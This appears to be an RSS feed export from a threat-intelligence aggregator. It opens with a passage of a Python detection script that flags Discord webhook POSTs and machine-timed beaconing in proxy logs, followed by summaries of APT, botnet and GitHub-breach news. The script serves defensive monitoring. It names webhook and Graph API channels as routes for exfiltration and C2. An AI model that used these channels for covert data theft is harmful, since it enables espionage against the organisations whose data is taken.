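WEBHOOK_PREFIX = "/api/webhooks/"
MIN_EVENTS = 8     # fewer requests than this cannot establish a cadence
MAX_CV = 0.2       # gap stdev divided by mean below this looks machine-timed


def parse_log(text: str) -> list:
    """CSV with header ts,src,host,method,path; ts is ISO 8601."""
    rows = []
    for rec in csv.DictReader(io.StringIO(text)):
        rec["ts"] = datetime.fromisoformat(rec["ts"])
        rows.append(rec)
    return rows


def webhook_posts(rows: list) -> list:
    """Discord webhooks are write-only endpoints; a workstation POSTing to
    one is exfiltration or C2 far more often than legitimate use."""
    return [r for r in rows
            if r["host"] in DISCORD_HOSTS and r["method"] == "POST"
            and r["path"].startswith(WEBHOOK_PREFIX)]


def beacon_candidates(rows: list, min_events: int = MIN_EVENTS, max_cv: float = MAX_CV) -> list:
    """(src, host, mean gap seconds, cv) for sources whose requests to a
    watched host arrive at a near-constant interval."""
    timestamps = defaultdict(list)
    for r in rows:
        if r["host"] in WATCHED_HOSTS:
            timestamps[(r["src"], r["host"])].append(r["ts"])
    hits = []
    for (src, host), times in timestamps.items():
        if min_events > len(times):
            continue
        times.sort()
        gaps = [(later - earlier).total_seconds() for earlier, later in zip(times, times[1:])]
        mean_gap = statistics.mean(gaps)
        if mean_gap == 0:
            continue
        cv = statistics.pstdev(gaps) / mean_gap
        if max_cv > cv:
            hits.append((src, host, round(mean_gap), round(cv, 3)))
    return hits


def _build_sample_log() -> str:
    """Constructed records: one implant beaconing every ~60 s with small
    jitter to a Discord webhook, one user reading mail through Graph."""
    base = datetime(2026, 5, 20, 8, 0, 0)
    lines = ["ts,src,host,method,path"]
    for off in (0, 60, 121, 179, 240, 302, 358, 420, 481, 539):
        ts = (base + timedelta(seconds=off)).isoformat()
        lines.append(f"{ts},10.0.8.14,discord.com,POST,/api/webhooks/1234/abcd")
    for off in (0, 35, 400, 410, 900, 1500, 1520, 2400, 3000):
        ts = (base + timedelta(seconds=off)).isoformat()
        lines.append(f"{ts},10.0.8.20,graph.microsoft.com,GET,/v1.0/me/messages")
    return "\n".join(lines) + "\n"


SAMPLE_LOG = _build_sample_log()

if __name__ == "__main__":
    rows = parse_log(SAMPLE_LOG)
    print(beacon_candidates(rows))
    print(len(webhook_posts(rows)), "webhook posts")
```

&lt;p&gt;An implant with heavy jitter defeats the cadence check, which is why the allowlisting and segmentation advice above matters: if only the mail and collaboration clients may reach graph.microsoft.com from workstations, any other process talking to it is the finding, regardless of timing. Key the aggregation on (src, host, user-agent) where your proxy records it to separate a browser tab from a background process on the same host.&lt;/p&gt;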
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Incident, High Severity, APT, Cyber Espionage&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: Dark Reading | &lt;a href=&quot;https://www.darkreading.com/endpoint-security/chinas-webworm-discord-microsoft-graphs&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Fri, 22 May 2026 07:01:00 GMT</pubDate>
      <dc:creator>Alexander Culafi</dc:creator>
      <source url="https://www.darkreading.com/endpoint-security/chinas-webworm-discord-microsoft-graphs">Dark Reading</source>
      <category>Incident</category>
      <category>APT</category>
      <category>Cyber Espionage</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>Alleged Kimwolf Botmaster ‘Dort’ Arrested, Charged in U.S. and Canada</title>
      <link>https://brewedintel.io/articles/4b5fed54-3428-4dda-9984-f961f352a130</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/4b5fed54-3428-4dda-9984-f961f352a130</guid>
      <description>The article reports the arrest of Jacob Butler, known as &#x27;Dort&#x27;, the operator of the Kimwolf IoT botnet. Kimwolf enslaved millions of IoT devices to launch record-breaking DDoS attacks, reaching nearly 30 Tbps and causing financial losses exceeding $1 million per victim. The botnet also targeted Department of Defense networks. Butler faces charges in Canada and the U.S. after launching DDoS, doxing, and swatting campaigns against researchers. The infrastructure for Kimwolf and three other botnets was seized with international law enforcement. The case highlights the ongoing threat from IoT botnets and the importance of securing such devices.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;The article reports the arrest of Jacob Butler, known as &amp;#x27;Dort&amp;#x27;, the operator of the Kimwolf IoT botnet. Kimwolf enslaved millions of IoT devices to launch record-breaking DDoS attacks, reaching nearly 30 Tbps and causing financial losses exceeding $1 million per victim. The botnet also targeted Department of Defense networks. Butler faces charges in Canada and the U.S. after launching DDoS, doxing, and swatting campaigns against researchers. The infrastructure for Kimwolf and three other botnets was seized with international law enforcement. The case highlights the ongoing threat from IoT botnets and the importance of securing such devices.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;Kimwolf demonstrates how unsecured IoT devices can be weaponized into massive DDoS botnets, causing record-breaking attack volumes, substantial financial losses, and potential disruption to critical infrastructure, including military networks.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Ensure all IoT devices are updated, use strong unique passwords, disable unnecessary services, and segment IoT networks from critical systems. Implement DDoS protection and monitoring solutions to detect and mitigate volumetric attacks.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Malware, Critical Severity, Botnet, DDoS&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: Krebs on Security | &lt;a href=&quot;https://krebsonsecurity.com/2026/05/alleged-kimwolf-botmaster-dort-arrested-charged-in-u-s-and-canada/&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Thu, 21 May 2026 21:50:25 GMT</pubDate>
      <dc:creator>BrianKrebs</dc:creator>
      <source url="https://krebsonsecurity.com/2026/05/alleged-kimwolf-botmaster-dort-arrested-charged-in-u-s-and-canada/">Krebs on Security</source>
      <category>Malware</category>
      <category>Botnet</category>
      <category>DDoS</category>
      <category>Critical Severity</category>
    </item>
    <item>
      <title>Chinese APTs Share Linux Backdoor in Central Asia Telco Attacks</title>
      <link>https://brewedintel.io/articles/4fe4fa1d-c042-4828-a015-7b5ac3c5a347</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/4fe4fa1d-c042-4828-a015-7b5ac3c5a347</guid>
      <description>Chinese APT groups have deployed a Linux backdoor codenamed &#x27;Showboat&#x27; against telecommunications providers in Central Asia. The malware enables persistent access and data exfiltration, targeting small market communications providers for espionage. The campaign highlights the ongoing threat to critical infrastructure and the need for enhanced network monitoring and endpoint security. Mitigation includes implementing robust access controls, regular patching, and monitoring for anomalous behavior indicative of backdoor activity.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;Chinese APT groups have deployed a Linux backdoor codenamed &amp;#x27;Showboat&amp;#x27; against telecommunications providers in Central Asia. The malware enables persistent access and data exfiltration, targeting small market communications providers for espionage. The campaign highlights the ongoing threat to critical infrastructure and the need for enhanced network monitoring and endpoint security. Mitigation includes implementing robust access controls, regular patching, and monitoring for anomalous behavior indicative of backdoor activity.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;Telecommunications providers are critical infrastructure; this backdoor enables long-term espionage and data theft.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Deploy endpoint detection and response (EDR) solutions, segment networks, and monitor for unusual outbound connections or file modifications.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Malware, High Severity, Backdoor, Cyber Espionage&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: Dark Reading | &lt;a href=&quot;https://www.darkreading.com/threat-intelligence/chinese-apts-linux-backdoor-telco-attacks&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Thu, 21 May 2026 14:00:00 GMT</pubDate>
      <dc:creator>Nate Nelson</dc:creator>
      <source url="https://www.darkreading.com/threat-intelligence/chinese-apts-linux-backdoor-telco-attacks">Dark Reading</source>
      <category>Malware</category>
      <category>Backdoor</category>
      <category>Cyber Espionage</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>Q1 2026 Threat Landscape Report: Zero-clicks, geopolitical tensions, and some wins for law enforcement</title>
      <link>https://brewedintel.io/articles/723c1d65-f727-4397-95ec-454f606301c7</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/723c1d65-f727-4397-95ec-454f606301c7</guid>
      <description>The Q1 2026 threat landscape report reveals that vulnerability exploitation has surpassed social engineering as the top initial access vector, with over half of exploited vulnerabilities being zero-click and network-facing, driven in part by AI-enabled exploitation. Geopolitical tensions continue to shape cyber operations, with Iranian state-aligned groups targeting government and industrial systems in the Middle East, while Russian and Chinese campaigns focus on intelligence collection and persistent access. Law enforcement takedowns of RAMP and LeakBase have disrupted major ransomware and credential marketplaces, pushing threat actors toward smaller communities. Ransomware is increasingly shifting toward &#x27;pure extortion&#x27; tactics that prioritize rapid data theft over encryption. The report emphasizes that organizations can no longer rely on periodic assessments and reactive workflows; they need continuous attack surface visibility, better risk prioritization, and the ability to respond at the speed of modern attackers to prevent small exposures from escalating into large-scale incidents.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;The Q1 2026 threat landscape report reveals that vulnerability exploitation has surpassed social engineering as the top initial access vector, with over half of exploited vulnerabilities being zero-click and network-facing, driven in part by AI-enabled exploitation. Geopolitical tensions continue to shape cyber operations, with Iranian state-aligned groups targeting government and industrial systems in the Middle East, while Russian and Chinese campaigns focus on intelligence collection and persistent access. Law enforcement takedowns of RAMP and LeakBase have disrupted major ransomware and credential marketplaces, pushing threat actors toward smaller communities. Ransomware is increasingly shifting toward &amp;#x27;pure extortion&amp;#x27; tactics that prioritize rapid data theft over encryption. The report emphasizes that organizations can no longer rely on periodic assessments and reactive workflows; they need continuous attack surface visibility, better risk prioritization, and the ability to respond at the speed of modern attackers to prevent small exposures from escalating into large-scale incidents.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;Attackers are increasingly exploiting zero-click vulnerabilities for initial access and shifting to pure extortion tactics, making reactive defense strategies ineffective.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Implement continuous attack surface monitoring and prioritize patching of zero-click, network-facing vulnerabilities to reduce exposure.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Vulnerability, High Severity, Ransomware, Vulnerability Exploitation&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: Rapid7 Security Research | &lt;a href=&quot;https://www.rapid7.com/blog/post/tr-q1-2026-threat-landscape-report-geopolitics-ransomware&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Thu, 21 May 2026 13:00:00 GMT</pubDate>
      <dc:creator>Rapid7 Labs</dc:creator>
      <source url="https://www.rapid7.com/blog/post/tr-q1-2026-threat-landscape-report-geopolitics-ransomware">Rapid7 Security Research</source>
      <category>Vulnerability</category>
      <category>Ransomware</category>
      <category>Vulnerability Exploitation</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>GitHub Confirms Breach, 4K Internal Repos Stolen</title>
      <link>https://brewedintel.io/articles/71ddfb20-c8cb-4ada-8581-46f05209e575</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/71ddfb20-c8cb-4ada-8581-46f05209e575</guid>
      <description>GitHub confirmed a data breach in which a threat actor named TeamPCP stole over 4,000 internal source code repositories. The breach could expose proprietary software, credentials, and intellectual property, significantly impacting GitHub and potentially its customers. GitHub is investigating the incident and has taken steps to secure its systems. Organizations should review their use of GitHub-hosted repositories and consider rotating secrets and credentials that may have been exposed. The incident underscores the importance of robust access controls and monitoring for unauthorized data exfiltration.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;GitHub confirmed a data breach in which a threat actor named TeamPCP stole over 4,000 internal source code repositories. The breach could expose proprietary software, credentials, and intellectual property, significantly impacting GitHub and potentially its customers. GitHub is investigating the incident and has taken steps to secure its systems. Organizations should review their use of GitHub-hosted repositories and consider rotating secrets and credentials that may have been exposed. The incident underscores the importance of robust access controls and monitoring for unauthorized data exfiltration.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;This breach exposes sensitive internal repositories that may contain secrets, credentials, and intellectual property, posing risks of further targeted attacks or supply chain compromises.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Rotate any credentials or secrets stored in affected repositories, enable multi-factor authentication, and monitor for anomalous access patterns that might indicate data exfiltration or lateral movement.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Incident, High Severity, Data Breach&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: Dark Reading | &lt;a href=&quot;https://www.darkreading.com/application-security/github-confirms-breach-4k-internal-repos-stolen&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Wed, 20 May 2026 20:51:32 GMT</pubDate>
      <dc:creator>Alexander Culafi</dc:creator>
      <source url="https://www.darkreading.com/application-security/github-confirms-breach-4k-internal-repos-stolen">Dark Reading</source>
      <category>Incident</category>
      <category>Data Breach</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>Microsoft Takes Down Malware-Signing Service Behind Ransomware Attacks</title>
      <link>https://brewedintel.io/articles/46c3bb9f-3535-4e14-9c5e-1692d34b072b</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/46c3bb9f-3535-4e14-9c5e-1692d34b072b</guid>
      <description>Microsoft disrupted a malware-signing-as-a-service (MSaaS) operation that abused its Artifact Signing system to sign malicious code, enabling ransomware and other attacks. The threat actor Fox Tempest offered this service, compromising thousands of machines globally. The takedown removes a key enabler for ransomware operations, highlighting the abuse of trusted signing services.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;Microsoft disrupted a malware-signing-as-a-service (MSaaS) operation that abused its Artifact Signing system to sign malicious code, enabling ransomware and other attacks. The threat actor Fox Tempest offered this service, compromising thousands of machines globally. The takedown removes a key enabler for ransomware operations, highlighting the abuse of trusted signing services.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;This operation enabled ransomware attacks against thousands of organizations by bypassing security controls through signed malware.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Monitor for unauthorized use of code signing certificates and enforce strict controls on signing processes to prevent abuse.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Malware, High Severity, Malware-as-a-Service, Ransomware&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: The Hacker News | &lt;a href=&quot;https://thehackernews.com/2026/05/microsoft-takes-down-malware-signing.html&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Wed, 20 May 2026 14:36:44 GMT</pubDate>
      <dc:creator>info@thehackernews.com (The Hacker News)</dc:creator>
      <source url="https://thehackernews.com/2026/05/microsoft-takes-down-malware-signing.html">The Hacker News</source>
      <category>Malware</category>
      <category>Malware-as-a-Service</category>
      <category>Ransomware</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>Webworm Deploys EchoCreep and GraphWorm Backdoors Using Discord and MS Graph API</title>
      <link>https://brewedintel.io/articles/64a4dded-65a0-4aa4-a79f-0f581c8ca8b0</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/64a4dded-65a0-4aa4-a79f-0f581c8ca8b0</guid>
      <description>In 2025, the China-aligned threat actor Webworm has been observed deploying two custom backdoors, EchoCreep and GraphWorm, which utilize Discord and Microsoft Graph API for command-and-control communications. Targeting government agencies, this campaign demonstrates the group&#x27;s continued evolution and reliance on legitimate services to evade detection. The use of widely trusted platforms like Discord and Microsoft Graph API makes their C2 traffic blend in with normal network activity, posing a significant challenge for defenders. Organizations should monitor anomalous API calls and Discord usage, and apply strict controls on outbound traffic to mitigate this threat.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;In 2025, the China-aligned threat actor Webworm has been observed deploying two custom backdoors, EchoCreep and GraphWorm, which utilize Discord and Microsoft Graph API for command-and-control communications. Targeting government agencies, this campaign demonstrates the group&amp;#x27;s continued evolution and reliance on legitimate services to evade detection. The use of widely trusted platforms like Discord and Microsoft Graph API makes their C2 traffic blend in with normal network activity, posing a significant challenge for defenders. Organizations should monitor anomalous API calls and Discord usage, and apply strict controls on outbound traffic to mitigate this threat.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;Webworm is a China-aligned APT actively targeting government agencies with backdoors that abuse popular services like Discord and Microsoft Graph API, enabling stealthy data exfiltration and persistent access.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Implement network monitoring for unusual Discord and MS Graph API traffic, restrict API access to approved applications, and deploy endpoint detection rules to identify the EchoCreep and GraphWorm backdoors.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Malware, High Severity, Backdoor, Command and Control via Legitimate Services&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: The Hacker News | &lt;a href=&quot;https://thehackernews.com/2026/05/webworm-deploys-echocreep-and-graphworm.html&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Wed, 20 May 2026 12:51:43 GMT</pubDate>
      <dc:creator>info@thehackernews.com (The Hacker News)</dc:creator>
      <source url="https://thehackernews.com/2026/05/webworm-deploys-echocreep-and-graphworm.html">The Hacker News</source>
      <category>Malware</category>
      <category>Backdoor</category>
      <category>Command and Control via Legitimate Services</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>GitHub Confirms Hack Impacting 3,800 Internal Repositories</title>
      <link>https://brewedintel.io/articles/85b3a408-081d-457c-b890-0c3b8564b790</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/85b3a408-081d-457c-b890-0c3b8564b790</guid>
      <description>The TeamPCP hacking group gained access to 3,800 of GitHub&#x27;s internal repositories after an employee installed a poisoned Visual Studio Code extension. The incident highlights the risks of software supply chain attacks via compromised developer tools. GitHub confirmed the breach, which affected internal code and potentially sensitive data. Organizations should enforce strict extension vetting and user education to prevent similar attacks.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;The TeamPCP hacking group gained access to 3,800 of GitHub&amp;#x27;s internal repositories after an employee installed a poisoned Visual Studio Code extension. The incident highlights the risks of software supply chain attacks via compromised developer tools. GitHub confirmed the breach, which affected internal code and potentially sensitive data. Organizations should enforce strict extension vetting and user education to prevent similar attacks.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;Internal repositories contain proprietary code and secrets; unauthorized access can lead to data theft or further compromise.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Implement strict controls on allowed extensions, conduct security training, and monitor for anomalous file access.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Malware, High Severity, Supply Chain Compromise, Trojanized Software&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: SecurityWeek | &lt;a href=&quot;https://www.securityweek.com/github-confirms-hack-impacting-3800-internal-repositories/&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Wed, 20 May 2026 09:28:53 GMT</pubDate>
      <dc:creator>Ionut Arghire</dc:creator>
      <source url="https://www.securityweek.com/github-confirms-hack-impacting-3800-internal-repositories/">SecurityWeek</source>
      <category>Malware</category>
      <category>Supply Chain Compromise</category>
      <category>Trojanized Software</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>A malicious VS Code extension just breached GitHub&#x27;s internal repositories</title>
      <link>https://brewedintel.io/articles/500a6c4e-534b-4f96-a02d-b19a3eb5397b</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/500a6c4e-534b-4f96-a02d-b19a3eb5397b</guid>
      <description>GitHub suffered a breach after an employee installed a trojanized Visual Studio Code extension from the official marketplace. The attack resulted in the exfiltration of approximately 3,800 internal repositories. The cybercrime group TeamPCP claimed responsibility and is demanding at least $50,000 for the stolen data, threatening public release if unpaid. GitHub detected the intrusion, removed the malicious extension, isolated the endpoint, and initiated incident response. The company stated that no customer data outside the affected repositories appears compromised, though investigations continue. The incident underscores the persistent risk of supply chain attacks targeting developer tools, as malicious extensions can bypass marketplace security and lead to major data breaches.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;GitHub suffered a breach after an employee installed a trojanized Visual Studio Code extension from the official marketplace. The attack resulted in the exfiltration of approximately 3,800 internal repositories. The cybercrime group TeamPCP claimed responsibility and is demanding at least $50,000 for the stolen data, threatening public release if unpaid. GitHub detected the intrusion, removed the malicious extension, isolated the endpoint, and initiated incident response. The company stated that no customer data outside the affected repositories appears compromised, though investigations continue. The incident underscores the persistent risk of supply chain attacks targeting developer tools, as malicious extensions can bypass marketplace security and lead to major data breaches.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;Even security-conscious organizations like GitHub can be breached through a single employee installing a malicious IDE extension, demonstrating that supply chain attacks on development tools pose a critical risk to intellectual property and internal systems.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Enforce strict policies on extension installations, limit developer endpoints to approved extensions only, implement behavior-based monitoring for unusual data exfiltration, and conduct regular security awareness training focused on trusted software supply chains.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Malware, Critical Severity, Data Theft, Extortion&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: Security Affairs (Data Breach) | &lt;a href=&quot;https://securityaffairs.com/192440/cyber-crime/a-malicious-vs-code-extension-just-breached-github-s-internal-repositories.html&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Wed, 20 May 2026 08:50:50 GMT</pubDate>
      <dc:creator>Pierluigi Paganini</dc:creator>
      <source url="https://securityaffairs.com/192440/cyber-crime/a-malicious-vs-code-extension-just-breached-github-s-internal-repositories.html">Security Affairs (Data Breach)</source>
      <category>Malware</category>
      <category>Data Theft</category>
      <category>Extortion</category>
      <category>Critical Severity</category>
    </item>
    <item>
      <title>Webworm: New burrowing techniques</title>
      <link>https://brewedintel.io/articles/cfad32d0-7648-4726-b60d-fd2791b8daf5</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/cfad32d0-7648-4726-b60d-fd2791b8daf5</guid>
      <description>ESET researchers have uncovered new tools and techniques adopted by the Webworm APT group, enhancing their capability for cyber espionage. The group&#x27;s updated arsenal increases the threat to targeted organizations, particularly in sectors of strategic interest. These developments highlight the need for heightened vigilance and adaptive defenses to counter the evolving tactics of this persistent threat actor. Organizations should review their security measures to mitigate potential breaches and data exfiltration risks.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;ESET researchers have uncovered new tools and techniques adopted by the Webworm APT group, enhancing their capability for cyber espionage. The group&amp;#x27;s updated arsenal increases the threat to targeted organizations, particularly in sectors of strategic interest. These developments highlight the need for heightened vigilance and adaptive defenses to counter the evolving tactics of this persistent threat actor. Organizations should review their security measures to mitigate potential breaches and data exfiltration risks.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;The Webworm APT group&amp;#x27;s new tools and techniques expand their ability to infiltrate networks and steal sensitive data, raising the risk of significant compromise for targeted organizations.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Strengthen endpoint detection and response capabilities, monitor for unusual network activity, and apply the latest security patches to counter these emerging threats.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Adversary, High Severity, Advanced Persistent Threat&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: ESET WeLiveSecurity | &lt;a href=&quot;https://www.welivesecurity.com/en/eset-research/webworm-new-burrowing-techniques/&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Wed, 20 May 2026 08:40:00 GMT</pubDate>
      <source url="https://www.welivesecurity.com/en/eset-research/webworm-new-burrowing-techniques/">ESET WeLiveSecurity</source>
      <category>Adversary</category>
      <category>Advanced Persistent Threat</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>GitHub investigates internal repositories breach claimed by TeamPCP</title>
      <link>https://brewedintel.io/articles/52f63cd4-c17c-4d83-9075-3cf475ad24f5</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/52f63cd4-c17c-4d83-9075-3cf475ad24f5</guid>
      <description>The TeamPCP hacker group claimed to have breached GitHub&#x27;s internal repositories, gaining access to approximately 4,000 private code repositories. GitHub is investigating the claim, which, if confirmed, could expose sensitive proprietary code and internal tools. The incident underscores the risk of insider or credential-based attacks targeting development environments. Organizations should enforce strict access controls and monitor for anomalous repository access.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;The TeamPCP hacker group claimed to have breached GitHub&amp;#x27;s internal repositories, gaining access to approximately 4,000 private code repositories. GitHub is investigating the claim, which, if confirmed, could expose sensitive proprietary code and internal tools. The incident underscores the risk of insider or credential-based attacks targeting development environments. Organizations should enforce strict access controls and monitor for anomalous repository access.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;A breach of internal repositories can expose proprietary code, secrets, and intellectual property, leading to competitive disadvantage or further attacks.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Implement repository-level access controls, audit access logs, enable multi-factor authentication for code repositories, and consider using encrypted code storage and monitoring for unauthorized access.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Incident, High Severity, Data Breach&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: Bleeping Computer | &lt;a href=&quot;https://www.bleepingcomputer.com/news/security/github-investigates-internal-repositories-breach-claimed-by-teampcp/&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Wed, 20 May 2026 05:08:42 GMT</pubDate>
      <dc:creator>Sergiu Gatlan</dc:creator>
      <source url="https://www.bleepingcomputer.com/news/security/github-investigates-internal-repositories-breach-claimed-by-teampcp/">Bleeping Computer</source>
      <category>Incident</category>
      <category>Data Breach</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>GitHub Investigating TeamPCP Claimed Breach of ~4,000 Internal Repositories</title>
      <link>https://brewedintel.io/articles/e743a09a-837c-48ae-a977-9f70da460934</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/e743a09a-837c-48ae-a977-9f70da460934</guid>
      <description>Threat actor TeamPCP claimed to have breached GitHub&#x27;s internal repositories and listed source code for sale. GitHub is investigating, stating no evidence of customer data impact. The breach involves unauthorized access to proprietary code, which could lead to intellectual property theft and further targeted attacks. Mitigation measures include reviewing access controls, rotating secrets, and monitoring for suspicious activity.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;Threat actor TeamPCP claimed to have breached GitHub&amp;#x27;s internal repositories and listed source code for sale. GitHub is investigating, stating no evidence of customer data impact. The breach involves unauthorized access to proprietary code, which could lead to intellectual property theft and further targeted attacks. Mitigation measures include reviewing access controls, rotating secrets, and monitoring for suspicious activity.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;The theft of GitHub&amp;#x27;s internal source code could expose proprietary algorithms and security measures, increasing risk for customers and the broader ecosystem.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Organizations should audit access to their source code repositories, enforce MFA, and monitor for anomalous downloads or exfiltration attempts.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Incident, High Severity, Data Exfiltration&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: The Hacker News | &lt;a href=&quot;https://thehackernews.com/2026/05/github-investigating-teampcp-claimed.html&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Wed, 20 May 2026 04:01:15 GMT</pubDate>
      <dc:creator>info@thehackernews.com (The Hacker News)</dc:creator>
      <source url="https://thehackernews.com/2026/05/github-investigating-teampcp-claimed.html">The Hacker News</source>
      <category>Incident</category>
      <category>Data Exfiltration</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>Microsoft Self-Service Password Reset abused in Azure data theft attacks</title>
      <link>https://brewedintel.io/articles/e291d27a-afde-4d4e-8fda-eee5ca462ffc</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/e291d27a-afde-4d4e-8fda-eee5ca462ffc</guid>
      <description>A threat actor tracked as STORM-1811 is actively targeting Microsoft 365 and Azure production environments by abusing legitimate applications such as Self-Service Password Reset (SSPR) and Azure AD administrative features. The attackers gain initial access through brute force, password spray, and phishing campaigns. Once inside, they exploit SSPR to persist and escalate privileges, enabling data theft. The campaign highlights the risk of abused native cloud features, which can evade traditional defenses. Organizations relying on Microsoft 365 and Azure should monitor for unusual SSPR activity, enforce multifactor authentication, and review privileged role assignments to mitigate this threat.</description>
